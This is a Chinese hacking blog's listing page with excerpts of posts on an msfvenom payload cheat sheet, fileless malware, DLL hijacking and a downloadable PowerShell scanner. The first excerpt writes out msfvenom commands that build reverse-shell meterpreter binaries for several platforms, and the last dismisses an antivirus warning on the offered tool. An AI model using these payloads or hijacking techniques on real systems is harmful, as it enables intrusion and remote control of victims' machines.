TypechoJoeTheme

Harvey

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 49 篇与 Gamma实验室 的结果
2020-10-19

Metasploit-有效负载备忘单

Metasploit-有效负载备忘单
“MSF生成各种有效负载的命令备忘录,建议收藏,忘了就拿出来多看看!”列出有效载荷:msfvenom -l二进制文件Linux: msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <要连接端口> -f elf> shell.elf Winodw: msfvenom -p windows / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f exe> shell.exe Mac: msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f macho> shell.macho android://需要签名 msfvenom -a x86 --platform Android -p android/meterpreter/r...
Harvey
2020-10-19

Gamma实验室

60 阅读
0 评论
2020年10月19日
60 阅读
0 评论
2020-10-19

hacker必会技能!

hacker必会技能!
“无文件恶意软件是一种操作及其简单但又及其危险的威胁,它能使某些网络防御无效。”背景资料:网络安全公司CrowdStrike发布了《2020全球威胁态势报告》,其研究结果显示“无文件恶意软件”攻击的趋势增加,无文件恶意软件的攻击数量超过了恶意软件的攻击数量。2019年,51%的攻击使用了无文件恶意软件技术,而在2018年,只有40%的攻击使用了无文件恶意软件技术。“可以看到无文件恶意软件攻击将会成为以后主流攻击手段,这也让防御方更加头疼!”优点:恶意软件攻击定义为:有恶意文件被写入磁盘,导致会被防护产品检测到试图运行该文件,然后识别或阻止它,这些入侵尝试相对来说比较容易拦截和阻止,通常可以用传统的反恶意软件解决方案有效地阻止。恶意软件攻击定义为:初始没有文件或文件片段被写入磁盘的攻击,例如包括代码从内存执行的攻击、或者利用盗取的凭证使用已知工具进行远程登录的攻击,需要更广泛更复杂的检测技术来可靠地识别和拦截,包括行为检测和人类威胁捕获但是什么是无文件恶意软件。“可以看到无文件恶意软件攻击最大的优点是,一次攻击将不会再执行的.exe或类似的东西,而是直接ARM运行有效载荷!”Pow...
Harvey
2020-10-19

渗透,Gamma实验室

66 阅读
0 评论
2020年10月19日
66 阅读
0 评论
2020-10-19

什么是DLL劫持

什么是DLL劫持
Windows在其基础体系结构中具有DLL的搜索路径(加载DLL文件要遵循目录查找优先级)。如果你可以找出没有绝对路径的可执行文件请求的DLL(触发此搜索过程),则可以将攻击代码的DLL放置在搜索路径的更高位置,以便在实际版本之前找到它,并且Windows会毫不犹豫将攻击代码提供给应用程序。让我们假设Windows的DLL搜索路径如下所示:A目录:<-可执行文件的当前工作目录,最高优先级,首先检查 B目录:\Windows C目录:\ Windows \ system32 D目录:\ Windows \ syswow64 <-最低优先级,最后检查这时候,可执行文件“ Foo.exe”请求加载“ bar.dll”,该文件恰好位于syswow64(D)子目录中。这使您有机会将恶意版本放置在A目录,B目录或C目录中,并将其加载到可执行文件中。如前所述,即使您可以用自己的版本替换DLL,即使是绝对的完整路径也无法防止这种情况。Microsoft Windows使用Windows文件保护机制来保护System32之类的系统路径,但是在企业解决方案中保护可执行文件免受DLL劫持的...
Harvey
2020-10-19

渗透,Gamma实验室

70 阅读
0 评论
2020年10月19日
70 阅读
0 评论
2020-10-18

懒人工具指南-powershell速扫

懒人工具指南-powershell速扫
点点按钮就能完成扫描,上手及其容易前言:“支持外网IP端口探测,局域网IP端口探测,共享资源探测,和天气查询功能,迈入黑客第一步,让你轻松上路!”就这小玩意还挺别致的嗷!实测:Cmd界面Powershell-gui界面查询ip等信息查询当地天气预报注意:win10以上系统可使用,win7请升级poweeshell到V5版本附上百度云资源: 链接:https://pan.baidu.com/s/1-juOKsi39e7fUAHlBagZxA 提取码:v7ce 附上powershell学习资料: 链接:https://pan.baidu.com/s/1sIcjKwr4Sk0Jezn8TTytnw 提取码:s765在扫描ip网卡信息的时候,杀毒软件会报毒,但其实没毒,就一堆批处理命令。
Harvey
2020-10-18

工具推送,Gamma实验室

65 阅读
0 评论
2020年10月18日
65 阅读
0 评论
Harvey
最怕碌碌无为还叹平凡可贵
107 文章数
11 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云

今日天气